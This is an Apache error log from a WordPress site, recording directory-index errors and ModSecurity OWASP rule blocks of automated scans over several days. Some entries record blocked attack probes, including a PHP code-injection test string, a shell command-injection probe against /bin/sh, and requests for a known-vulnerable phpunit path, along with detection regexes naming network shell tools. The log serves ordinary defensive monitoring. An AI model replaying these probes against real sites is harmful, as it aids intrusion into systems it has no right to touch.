(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Sun Dec 25 16:30:42.892954 2022] [autoindex:error] [pid 3069:tid 140578213840640] [client 91.134.248.245:38178] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/crop/index.php [Sun Dec 25 16:36:23.375223 2022] [autoindex:error] [pid 2178:tid 140578188662528] [client 162.241.217.168:38296] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/Text/index.php [Sun Dec 25 18:18:18.151355 2022] [autoindex:error] [pid 2178:tid 140578213840640] [client 91.134.248.249:40306] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/2021/index.php [Mon Dec 26 01:21:29.610058 2022] [autoindex:error] [pid 3069:tid 140578171877120] [client 5.78.53.177:48646] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Dec 26 15:16:37.832087 2022] [autoindex:error] [pid 4810:tid 139932660107008] [client 111.221.45.22:34906] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Mon Dec 26 15:41:15.583049 2022] [:error] [pid 5400:tid 139932693677824] [client 5.188.62.140:35336] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y6oG6-VN5-V_CZtc46vHUAAAAMo"] [Tue Dec 27 10:20:49.874302 2022] [autoindex:error] [pid 30614:tid 140509603403520] [client 192.185.4.147:58754] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Tue Dec 27 10:59:18.347842 2022] [:error] [pid 30022:tid 140509603403520] [client 5.188.62.76:60440] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y6sWVpuDNrHKAzyCLrSBoQAAAIY"] [Tue Dec 27 23:42:18.163827 2022] [autoindex:error] [pid 30022:tid 140509519476480] [client 129.151.125.195:49366] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Decode/HTML/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/Decode/HTML/index.php [Wed Dec 28 00:16:23.504443 2022] [:error] [pid 30020:tid 140509561440000] [client 152.89.196.13:50172] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y6vRJ1gxJSyEo46LbzfW_gAAAAs"] [Wed Dec 28 13:57:07.109426 2022] [autoindex:error] [pid 989:tid 139634501052160] [client 202.172.28.10:39622] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Wed Dec 28 18:05:18.885178 2022] [autoindex:error] [pid 376:tid 139634501052160] [client 184.168.98.94:45186] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Thu Dec 29 04:24:09.795806 2022] [autoindex:error] [pid 19786:tid 139801604855552] [client 116.0.21.36:56482] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Thu Dec 29 09:14:34.516980 2022] [autoindex:error] [pid 19788:tid 139801646819072] [client 43.129.208.157:34364] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/Text/index.php [Thu Dec 29 09:14:38.067991 2022] [autoindex:error] [pid 20380:tid 139801571284736] [client 43.129.208.157:34370] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/Text/index.php [Thu Dec 29 10:58:29.420414 2022] [autoindex:error] [pid 19786:tid 139801562892032] [client 118.27.125.44:37354] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/blue/index.php [Fri Dec 30 22:44:04.358678 2022] [autoindex:error] [pid 13829:tid 140175829026560] [client 91.134.248.211:58214] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Sat Dec 31 02:53:58.485013 2022] [autoindex:error] [pid 13829:tid 140176065402624] [client 5.78.56.215:33702] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Dec 31 10:08:20.756376 2022] [autoindex:error] [pid 28168:tid 139966474581760] [client 157.90.133.118:44970] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/HTTP/index.php [Sat Dec 31 17:07:08.983812 2022] [:error] [pid 28166:tid 139966516545280] [client 5.188.62.140:59314] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7CyjMwWe7HAoX9quHuh6QAAAAY"] [Sun Jan 01 07:03:22.800857 2023] [autoindex:error] [pid 25205:tid 139631467132672] [client 185.86.18.229:59000] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/skins/lightgray/fonts/index.php [Sun Jan 01 09:05:33.022307 2023] [:error] [pid 25528:tid 139631643694848] [client 89.252.178.107:35008] [client 89.252.178.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "Y7GTLUYJTemu4QbZzeZkoAAAAME"] [Sun Jan 01 14:46:39.893874 2023] [autoindex:error] [pid 25205:tid 139631635302144] [client 20.169.80.246:46568] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Jan 02 02:57:27.239770 2023] [autoindex:error] [pid 25205:tid 139631643694848] [client 158.69.23.79:43478] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jan 02 02:57:30.642360 2023] [autoindex:error] [pid 25528:tid 139631643694848] [client 158.69.23.79:43482] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jan 02 02:59:29.330733 2023] [autoindex:error] [pid 25528:tid 139631652087552] [client 158.69.23.79:43574] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jan 02 12:20:38.058627 2023] [:error] [pid 16575:tid 140361376675584] [client 5.188.62.76:35236] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7MSZmMNpInSjlo6szZLSwAAANA"] [Mon Jan 02 13:29:27.292590 2023] [:error] [pid 15293:tid 140698540033792] [client 5.188.62.21:37758] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7MihyYTr44ITt0OorewgAAAAIo"] [Mon Jan 02 13:33:46.421307 2023] [:error] [pid 15385:tid 140698698393344] [client 199.195.250.129:37924] [client 199.195.250.129] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:A. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |echo found within ARGS:A: |echo echo -n adxvqakjyh|md5sum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/bin/sh"] [unique_id "Y7MjiqsQbjKKUytTQ7fipgAAAMA"] [Mon Jan 02 16:08:18.358596 2023] [:error] [pid 15293:tid 140698556819200] [client 20.126.122.50:45798] [client 20.126.122.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/indeed-membership-pro/classes/PaymentGateways/mollie/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Y7NHwiYTr44ITt0OoreyjgAAAIg"] [Mon Jan 02 16:17:58.862766 2023] [:error] [pid 15291:tid 140698664822528] [client 5.188.62.26:46072] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7NKBmAX55bIN4mI6cDY7QAAAAQ"] [Mon Jan 02 17:27:08.557180 2023] [:error] [pid 15292:tid 140698472892160] [client 5.188.62.174:49166] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7NaPE-eaVsiW7rp1JVl3gAAAFI"] [Mon Jan 02 21:08:19.457086 2023] [:error] [pid 15546:tid 140698531641088] [client 5.188.62.76:60126] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7OOE3-4X4fOTw02P3u8FQAAAIs"] [Tue Jan 03 02:10:26.837345 2023] [:error] [pid 15546:tid 140698523248384] [client 5.188.62.174:43162] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7PU4n-4X4fOTw02P3u-0gAAAIw"] [Tue Jan 03 06:09:32.682438 2023] [:error] [pid 7426:tid 140548627158784] [client 5.188.62.76:51002] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7QM7JaQV_M-tyf8zWFfzAAAAJQ"] [Tue Jan 03 06:32:41.978410 2023] [:error] [pid 7424:tid 140548677515008] [client 5.188.62.21:51876] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7QSWRemwjuI14SnKcwsygAAAA4"] [Tue Jan 03 11:01:37.066228 2023] [:error] [pid 8015:tid 140548660729600] [client 5.188.62.174:33452] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7RRYTqN0q5w_UKISvmCvQAAANA"] [Tue Jan 03 11:13:54.449668 2023] [:error] [pid 8015:tid 140548736263936] [client 5.188.62.140:33850] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7RUQjqN0q5w_UKISvmDBwAAAMc"] [Tue Jan 03 23:41:18.749157 2023] [:error] [pid 19699:tid 140548859905792] [client 5.188.62.21:37894] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y7UDbgzGBGL1e3OwaedA5gAAAQE"] [Wed Jan 04 03:08:07.479834 2023] [:error] [pid 19759:tid 140548778227456] [client 5.188.62.26:44362] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag 